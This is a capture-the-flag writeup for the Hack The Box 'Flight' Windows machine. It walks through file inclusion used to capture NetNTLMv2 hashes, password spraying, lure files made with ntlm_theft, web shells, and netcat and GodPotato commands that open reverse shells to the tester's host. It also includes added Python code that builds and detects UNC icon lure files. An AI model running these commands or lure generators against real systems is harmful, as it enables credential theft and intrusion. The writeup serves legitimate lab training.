HackTheBox

Writeups for the Hack The Box machines

Enumeration:

I started the enumeration with a quick RustScan sweep, handing the discovered ports to Nmap for service and version detection. Multiple ports were open on the target:

rustscan -a 10.10.11.187 -- -A -T4 -vv -oN flight_nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-09-04 12:46:18Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49719/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=9/4%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=66D7F491%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
SEQ(SP=FC%GCD=1%ISR=105%TI=I%II=I%SS=S%TS=U)
OPS(O1=M53CNW8NNS%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m01s
| smb2-time: 
|   date: 2024-09-04T12:47:19
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 32072/tcp): CLEAN (Timeout)
|   Check 2 (port 46616/tcp): CLEAN (Timeout)
|   Check 3 (port 44855/udp): CLEAN (Timeout)
|   Check 4 (port 27585/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   221.03 ms 10.10.14.1
2   221.13 ms 10.10.11.187

From the port scan I identified the domain flight.htb (hostname G0) and added it to /etc/hosts. The scan also reports a clock skew of about 7 hours relative to the DC. Kerberos rejects requests outside its tolerance (5 minutes by default), so before any ticket-based step later on (AS-REP roasting, Kerberoasting) the local clock has to be brought in line with the DC, for example with ntpdate against 10.10.11.187 or by wrapping the tool in faketime.

Subdomain enumeration:

Port 53 was open and the web server on port 80 was likely serving name-based virtual hosts, so I checked for additional subdomains by fuzzing the HTTP Host header with ffuf, filtering out responses of the default page size (7069 bytes). Two virtual hosts came back:

ffuf -H "Host: FUZZ.flight.htb" -u http://10.10.11.187/ -w /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 7069

I added both subdomains, school and deltek, to my host configuration file.

Web Enumeration:

Next, I moved on to web enumeration, since an HTTP server was running on port 80. Browsing flight.htb showed a flight booking website.

I ran a directory brute-force against the site but found nothing useful in the results.

I then browsed to school.flight.htb, which hosts an aviation school website.

Directory enumeration of the school vhost turned up /cgi-bin/printenv.pl, the stock CGI script that prints the web server's environment. Reading it revealed several internal details, including:

  - the account Apache runs as: svc_apache
  - the server stack: XAMPP
  - CGI version: 1.1

Lastly, I enumerated deltek.flight.htb and found it identical to flight.htb; a directory search there yielded the same results.

Kerberos:

Next, I enumerated the Kerberos service for valid usernames with kerbrute. The only account it confirmed was Administrator:

kerbrute userenum --dc flight.htb -d flight.htb /usr/share/SecLists/Usernames/cirt-default-usernames.txt

RPC & LDAP:

Next, I attempted RPC and LDAP enumeration with null (anonymous) binds. Both failed, as the DC requires authentication:

ldapsearch -x -H ldap://flight.htb -s base namingcontexts

SMB enumeration:

Next, I attempted SMB enumeration with NULL and Guest sessions, but neither was permitted.


Initial Access:

Since I had not found an initial access vector, I revisited school.flight.htb. The site loads its pages by file name (about.html and so on), and I found that this is a file inclusion: the requested name is passed straight to a file read, which let me read any file in the current web directory.

Replacing about.html with C:/xampp/cgi-bin/printenv.pl returned the contents of that script:

I tried other files, such as user.txt, without success. index.php, which sits in the same web root, did load, and its source showed that the application checks the requested value against a denylist of strings before including it:

Knowing that, I tried to force the server to authenticate to me by pointing the include at a UNC path on my Responder listener. The backslash spelling of the path was caught by the denylist:

Windows accepts forward slashes as path separators as well, and the denylist did not account for that. Written with forward slashes, the UNC path went through, Apache (running as svc_apache) tried to open the share over SMB, and Responder captured the NetNTLMv2 challenge-response:

I fed the hash to Hashcat (mode 5600, NetNTLMv2) and within moments recovered the plaintext password for svc_apache:
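The separator issue above, as an added example that is not part of the original writeup and not the school site's actual code: a denylist modelled on what the writeup describes, Python's ntpath showing how Windows reads the forward-slash spelling, and an allowlist-style resolver that rejects both spellings along with absolute and traversal paths. WEB_ROOT is an assumed path; the real document root is not shown in the writeup.

```python
import ntpath
from typing import Optional

# Assumed for this example: the document root the include is relative to.
WEB_ROOT = r"C:\xampp\htdocs\school"


def denylist_allows(view: str) -> bool:
    """Denylist check modelled on what the writeup describes: traversal and
    backslashes are rejected, but nothing is said about forward slashes.
    Returns True when the value would be passed on to the file read."""
    lowered = view.lower()
    return ".." not in lowered and "\\" not in lowered


def normalised_windows_path(view: str) -> str:
    """How Windows itself reads the value: ntpath treats '/' and '\\' as
    interchangeable, so '//host/share' becomes the UNC path '\\\\host\\share'."""
    return ntpath.normpath(view)


def is_remote_unc(view: str) -> bool:
    """True when the value names a UNC share, in either separator spelling."""
    drive, _ = ntpath.splitdrive(view)
    return drive.startswith(("\\\\", "//"))


def hardened_resolve(view: str) -> Optional[str]:
    """Allowlist-style replacement for the denylist: accept only a relative
    name, join it under WEB_ROOT, normalise, and require the result to stay
    inside WEB_ROOT. Returns the resolved path, or None when rejected."""
    if not view or view[0] in "\\/":          # rooted paths (and UNC) are out
        return None
    if ntpath.splitdrive(view)[0]:            # 'C:' or '\\\\host\\share' prefix
        return None
    candidate = ntpath.normpath(ntpath.join(WEB_ROOT, view))
    if not candidate.lower().startswith(WEB_ROOT.lower() + "\\"):
        return None                           # '..' climbed out of the root
    return candidate


if __name__ == "__main__":
    for probe in (r"\\10.10.14.5\share", "//10.10.14.5/share",
                  "C:/xampp/cgi-bin/printenv.pl", "../index.php", "about.html"):
        print(f"{probe:32} denylist={denylist_allows(probe)!s:5} "
              f"unc={is_remote_unc(probe)!s:5} hardened={hardened_resolve(probe)}")
```

The point of the resolver is that it never tries to enumerate bad characters: it decides what a good value looks like (a relative name that stays under the root after normalisation) and rejects everything else, so a second spelling of the same path cannot slip past it.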

User enumeration:

With the svc_apache password in hand, I enumerated the domain users and found 15 valid accounts:

nxc smb flight.htb -u svc_apache -p '*********' --users

SMB Shares:

Next, I listed the shares available to this user and found several that were readable:

nxc smb flight.htb -u svc_apache -p '********' --shares

Using these credentials and smbclient-ng, I browsed the shares and saw a number of files, but svc_apache had no write access to any of them:

smbclientng -u 'svc_apache' -p '**********' --target flight.htb

Despite the read permissions, I found nothing useful in the shared folders.

Password spray:

With 15 valid usernames and one known password, I sprayed the svc_apache password across the whole user list (netexec's SMB module with the user file and the --continue-on-success flag). It was also accepted for s.moon, whose credentials are used in the sections that follow.

AS-REP Roast & Kerberoast:

Before going back to the file shares, I tried AS-REP roasting and Kerberoasting to obtain crackable Kerberos material for any account. Neither attack produced anything:

impacket-GetNPUsers flight.htb/ -usersfile users.txt -dc-ip 10.10.11.187 -format hashcat

nxc ldap flight.htb -u s.moon -p '********' --kerberoasting kerb.out

Forced Authentication Using Shortcut Files

As s.moon I had write access to one folder on the share (Shared), so the remaining option was to drop a file there that references my Responder host: whoever browses the folder will authenticate to me and leak a NetNTLMv2 response. I started with a .lnk file, using the slinky module from netexec:

nxc smb flight.htb -u s.moon -p '********' -M slinky -o Name=TestFiler server=10.10.14.5

This did not work: the share restricts the file extensions that can be written.

After researching alternatives, I found ntlm_theft (via an ippsec video). The tool generates 21 different file types, each embedding a UNC reference to the attacker host (desktop.ini, .url, .scf and others), so a format that the extension restriction still allows can be picked.

Using ntlm_theft, I generated all the file types:

python3 ntlm_theft.py -g all -s 10.10.14.5 -f TestingTest

After generating the files, I started Responder and began uploading them one at a time, starting with desktop.ini:

sudo responder -I tun0

Shortly afterwards the user c.bum accessed the Shared folder, and Responder captured their NetNTLMv2 hash:

I cracked the hash with John the Ripper (format netntlmv2) and retrieved the plaintext password:
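How the dropped files work, and how the owner of a writable share could spot them, as an added example that is not part of the writeup and not ntlm_theft's code: build_lures produces the three plain-text formats named above (desktop.ini, .url, .scf) from their documented layouts, and find_unc_icon_refs scans file contents for icon keys that point at a remote host. The listener address is the one used in the writeup; the share name, icon name, file base name and the benign sample are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed for this example; the listener address matches the writeup.
ATTACKER = "10.10.14.5"


def build_lures(listener: str, base_name: str) -> Dict[str, str]:
    """Return {file name: contents} for three plain-text lure formats that make
    Explorer fetch an icon from a UNC path when the containing folder is
    browsed. Written from the documented INI layouts of each format."""
    unc = f"\\\\{listener}\\share\\icon.ico"      # share and icon name are made up
    return {
        "desktop.ini": "[.ShellClassInfo]\r\n"
                       f"IconResource={unc}\r\n",
        f"{base_name}.url": "[InternetShortcut]\r\n"
                            "URL=https://example.invalid/\r\n"
                            f"IconFile={unc}\r\n"
                            "IconIndex=1\r\n",
        f"{base_name}.scf": "[Shell]\r\n"
                            "Command=2\r\n"
                            f"IconFile={unc}\r\n"
                            "[Taskbar]\r\n"
                            "Command=ToggleDesktop\r\n",
    }


# Keys whose value the shell resolves as a path, and a UNC prefix pattern that
# accepts either separator spelling and captures the host.
_ICON_KEYS = ("IconResource", "IconFile")
_UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/\s]+)[\\/]")


def find_unc_icon_refs(files: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Scan {name: contents} for icon keys pointing at a remote host.
    Returns (file name, key, host) per hit; local icon paths such as
    'C:\\Windows\\System32\\shell32.dll,3' are ignored."""
    hits = []
    for name, body in files.items():
        for line in body.splitlines():
            key, sep, value = line.partition("=")
            if not sep or key.strip() not in _ICON_KEYS:
                continue
            match = _UNC_RE.match(value.strip())
            if match:
                hits.append((name, key.strip(), match.group(1)))
    return hits


if __name__ == "__main__":
    lures = build_lures(ATTACKER, "TestingTest")
    for name, key, host in find_unc_icon_refs(lures):
        print(f"{name}: {key} -> {host}")
```

None of these formats needs an executable extension, which is why they remain an option when a share blocks .lnk uploads; the same property means a periodic scan of writable shares for icon keys pointing at non-corporate hosts is a cheap detection.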

Uploading Web Shell:

With the c.bum account, I revisited the shares and found that I had write access to the Web directory:

I authenticated to this share with smbclient-ng and uploaded a PHP-based web shell:

After uploading, I requested the file over HTTP and confirmed that the web shell was reachable. Running whoami showed that it executes as svc_apache, the Apache service account seen earlier in printenv.pl:

I then started Villain C2, generated a payload for a callback, and executed it through the web shell. This gave me a session connecting back to my Kali host:

generate payload=windows/hoaxshell/powershell_iex lhost=tun0 encode    #from Villain C2

I used Villain C2 for two main reasons:


Lateral Movement:

After gaining shell access, I began exploring options for lateral movement. I first checked the privileges and group memberships of the current user but found no special privileges or privileged group memberships:

net user svc_apache

whoami /all

I then searched the file system for stored passwords or hard-coded credentials in scripts. I found nothing useful, and in some directories I lacked the permissions to look.

svc_apache -> c.bum

Next, I listed the TCP ports open on the machine and found that 5985 (WinRM) and 8000 were listening. Neither appeared in the initial port scan, so they are not reachable from outside, either blocked by the host firewall or bound to a local interface only:

netstat -ant | select-string "tcp"
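A quick check for the situation above, as an added example that is not part of the writeup: it parses Windows netstat -ano output (a constructed sample here, with the writeup's 5985 and 8000 listening) and diffs it against the ports the external Nmap scan reported, marking each missing listener as loopback-only or filtered. The PIDs and the 127.0.0.1 binding of port 8000 in the sample are constructed.

```python
from typing import Dict, Set

# Constructed sample in the format of Windows `netstat -ano`.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4372
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8000         0.0.0.0:0              LISTENING       5120
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    10.10.11.187:49694     10.10.14.5:4444        ESTABLISHED     2132
  UDP    0.0.0.0:53             *:*                                    2676
"""

# Ports the external Nmap scan in this writeup reported open.
EXTERNAL_OPEN = {53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269,
                 9389, 49667, 49673, 49674, 49694, 49719}

LOOPBACK = ("127.", "[::1]")


def tcp_listeners(netstat_output: str) -> Dict[int, str]:
    """Parse `netstat -ano` text into {port: bound address} for TCP sockets in
    LISTENING state. Handles IPv4 'a.b.c.d:port' and IPv6 '[addr]:port'."""
    listeners = {}
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        addr, _, port = fields[1].rpartition(":")   # rpartition copes with [::]
        listeners[int(port)] = addr
    return listeners


def hidden_listeners(netstat_output: str, external_open: Set[int]) -> Dict[int, str]:
    """Listening TCP ports the outside scan did not see. 'loopback-only' means
    reachable only via a tunnel to the host's own 127.0.0.1 (what ligolo-ng's
    240.0.0.1 provides); 'filtered' means bound to all interfaces, so something
    in between is blocking it."""
    result = {}
    for port, addr in tcp_listeners(netstat_output).items():
        if port in external_open:
            continue
        result[port] = "loopback-only" if addr.startswith(LOOPBACK) else "filtered"
    return result


if __name__ == "__main__":
    for port, why in sorted(hidden_listeners(SAMPLE_NETSTAT, EXTERNAL_OPEN).items()):
        print(f"{port}: {why}")
```

Either classification leads to the same next step in this writeup (tunnel to the host and hit the port from its own loopback), but the distinction matters when deciding whether a firewall rule or a bind address is the control worth reporting.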

Port Forwarding:

To reach these ports from my Kali host, I used ligolo-ng. I deployed the Ligolo agent on the Windows host and set up the tunnel as follows:

sudo ip tuntap add user kali mode tun ligolo #create the ligolo tun interface

sudo ip link set ligolo up #bring the interface up

./proxy -selfcert #start the ligolo proxy with a self-signed certificate

.\agent.exe -connect kali_ip:11601 -ignore-cert #on the target: connect back to the proxy

session #in the proxy console: select the agent's session

start #then start the tunnel for that session

sudo ip route add 240.0.0.1/32 dev ligolo #route to the agent host's own loopback

ligolo-ng maps 240.0.0.1 to the agent host's 127.0.0.1, which is what makes listeners such as 8000 and 5985 reachable from Kali without exposing them through the Windows firewall.

After setting up the route, I accessed the web service on port 8000 and found another flight booking application:

Next, I tried to authenticate as c.bum over WinRM (port 5985), since I had valid credentials for this user. The login was refused for lack of rights, which is what happens when the account is neither a member of Remote Management Users nor a local administrator:

evil-winrm -i 240.0.0.1 -u 'c.bum' -p '**********'

Shell as c.bum:

Checking group memberships, I found that c.bum is a member of the WebDevs group, which likely grants write access to the web root:

net user c.bum

To work in the web root as c.bum I needed a shell as that user, not just the password. The built-in runas.exe is unusable from a non-interactive reverse shell because it insists on prompting for the password. RunasCs accepts the password as an argument, creates the process with the new logon from within the current shell, and can redirect the new process's input and output to a remote listener.

I transferred the RunasCs binary to the target and executed it with the c.bum credentials, using -r to send a reverse shell to my listener:

.\RunasCs.exe c.bum ******* powershell.exe -r 10.10.14.5:4443

Immediately after executing the command, I received a session as c.bum in Villain C2:

Shell as iis apppool\defaultapppool:

As c.bum, I navigated to the development web root at C:\inetpub\development (the IIS site served on port 8000) and tried uploading a PHP web shell:

The PHP web shell did not execute, presumably because the IIS site has no PHP handler configured, so the file is served rather than run:

I switched to an ASPX web shell and uploaded it to the development directory. This time the web shell executed:

I ran a Villain C2 payload from it and received a reverse session:

This shell proved unstable, so I uploaded a netcat binary to the target and executed it through the ASPX shell:

C:\temp\nc64.exe -e cmd.exe 10.10.14.5 4444

This gave me a stable interactive shell as iis apppool\defaultapppool:

Shell as SYSTEM:

With a stable shell in place, I checked the privileges of the current user and found SeImpersonatePrivilege, which IIS application pool identities hold by default. An account holding it can impersonate any token it can get hold of, and the Potato family of tools coerces a SYSTEM token into its hands, so escalation to SYSTEM was available:

I used GodPotato for this. After uploading it to the target, I ran GodPotato-NET4.exe with the netcat binary as the command to spawn, to get a reverse shell as SYSTEM:

.\GodPotato-NET4.exe -cmd "nc64.exe 10.10.14.5 4433 -e cmd"

Immediately after execution, I received a connection back on my netcat listener with SYSTEM privileges (pwn3d!🎉):

With SYSTEM access, I retrieved both the user and root flags from the host.